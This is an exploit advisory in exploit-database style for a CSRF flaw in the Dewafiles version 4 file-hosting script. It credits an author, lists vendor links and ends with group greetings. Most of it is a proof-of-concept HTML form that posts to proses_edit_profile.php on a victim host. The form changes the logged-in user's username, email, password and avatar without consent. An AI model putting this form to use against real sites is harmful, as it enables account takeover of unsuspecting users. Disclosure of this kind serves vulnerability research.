# Exploit Title: Dewafiles Versi 4 - CSRF Vulnerabilities
# Author Exploit : vir0e5
# Date    : 08-06-2012
# Site     	:  http://blog.megasoft-id.com/
# Vendor  	: http://blog.megasoft-id.com/article/dewafiles/
# Version         : Dewafiles versi 4
# Software Link: http://blog.megasoft-id.com/article/dewafiles/
# Tested on       : Window and Linux
# CVE : [not yet]

[ Vulnerable File ]
~ proses_edit_profile.php

[ Exploit ]
<form enctype="multipart/form-data" action="http://korban.com/proses_edit_profile.php" method="POST">
	<input type="hidden" name="id" value="<?PHP echo $id; ?>">
	<p><me>Username</me></br>
	<input type="text" style="width:100%" required name='username' value="<?PHP echo $_SESSION['my_name']; ?>">
	<p><me>Email</me></br>
	<input type="text" style="width:100%" required name='email' value="<?PHP echo $email; ?>">
	<p><me>Password</me></br>
	<input type="password" style="width:100%" required name='pswd' value="<?PHP echo $pswd; ?>">
	<p><me>Gender</me></br>
	<select style="width:100%" required name="gender">
		<option><?PHP echo $gender; ?></option>
		<option>Male</option>
		<option>Female</option>
	</select>
	<p><me>Your Avatar</me></br>
	<img src="<?PHP echo $photo ?>" width="60" height="60"></br>
	Default Avatar : "<?PHP echo $photo; ?>"</br>
	Change => <input style="width:200px" type="file" name="photo">
	<p>
	<input type="submit" class="button" value="Save">
</form>


*************************************************************
[+] Greetz :INDONESIAN SECURITY - TASIK CYBER - INDONESIAN CODER - EXPLOIT-ID;